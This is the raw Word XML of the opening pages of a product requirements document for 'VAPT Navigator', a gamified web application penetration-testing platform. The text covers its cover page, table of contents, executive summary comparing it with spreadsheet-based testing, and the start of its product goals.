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0" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:cs="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t xml:space="preserve">🔐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">VAPT NAVIGATOR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Intelligent Web Application Security Testing Platform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0EA5E9" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Product Requirements Document (PRD) — v1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EF4444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Classification: INTERNAL | Security Engineering Division</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="16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Document Owner</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Security Engineering Team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 — Initial Release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Draft → Review → Approved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Created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Fri Feb 27 2026</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Framework</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Next.js 14 + FastAPI + PostgreSQL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Classification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INTERNAL CONFIDENTIAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2563EB" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1.  Executive Summary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  Product Vision &amp; Goals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3.  Technology Architecture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">4.  Database Design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">5.  Application Onboarding Flow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">6.  Testing Journey — Gamification Framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">7.  Test Phase 1: Reconnaissance &amp; URL Analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">8.  Test Phase 2: Pre-Authentication Testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">9.  Test Phase 3: Authentication Testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.  Test Phase 4: Post-Authentication Testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	28</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">11.  Test Phase 5: Business Logic Testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	33</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">12.  Test Phase 6: API &amp; Web Services Testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	36</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">13.  Test Phase 7: Client-Side Testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	40</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">14.  Test Phase 8: Transport &amp; Cryptography</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	43</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">15.  Test Phase 9: Infrastructure &amp; Configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	45</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">16.  Test Phase 10: Automated Tool Integration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	47</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">17.  Payload Library &amp; Tool Commands</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	50</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">18.  UI/UX Design System &amp; Animations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	55</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">19.  Gamification &amp; Psychology Engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	58</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">20.  Reports &amp; Dashboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	60</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">21.  Security of the Platform Itself</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	63</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">22.  DevOps &amp; Deployment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	65</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">23.  Future Roadmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	67</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9200"/>
        </w:tabs>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">24.  Appendix: Full Test Case Catalog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">	69</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</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VAPT Navigator is a next-generation, gamified web application security testing platform designed specifically for penetration testers, application security engineers, and security leads in enterprise environments. It transforms the traditionally monotonous checklist-driven VAPT process into an engaging, guided, intelligent, and trackable journey — ensuring complete coverage, zero test case fatigue, and professional-grade reporting.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none" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="EBF4FF"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THE CORE PROBLEM</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Today, VAPT testing is performed via static Excel spreadsheets with no payloads, no guidance, no tool commands, no contextual filtering, no progress tracking, and no gamification. Testers get bored, miss test cases, and produce inconsistent reports.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none" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="F0FDF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="10B981"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅ THE SOLUTION</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VAPT Navigator intelligently filters test cases based on the application stack, guides testers step-by-step through an animated journey, provides live payloads &amp; tool commands, gamifies progress with achievements, and generates executive-grade security reports automatically.</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Traditional VAPT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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VAPT Navigator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Guidance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Step-by-step animated flow</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Payloads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Manual search</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Contextual inline library</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Tool Commands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From memory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Pre-built with exact flags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Progress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Excel row</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Visual gamified dashboard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Filtering</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Manual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AI-driven stack detection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Reports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Manual Word doc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Auto-generated HTML + DOCX</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Motivation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Boring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Achievements + streaks + XP</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Multi-Project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Multiple files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Unified dashboard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Collaboration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Email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Real-time team view</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0A1628"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Product Vision &amp; Goals</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2.1 Vision Statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="334155"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"To be the single source of truth for web application security testing — where every tester, regardless of experience level, can conduct thorough, guided, and enjoyable security assessments with 100% coverage confidence."</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2.2 Primary Goals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">G1: Achieve 100% test case coverage for every web application stack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">G2: Reduce test case miss rate to &lt; 2% through guided flows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="20"/>
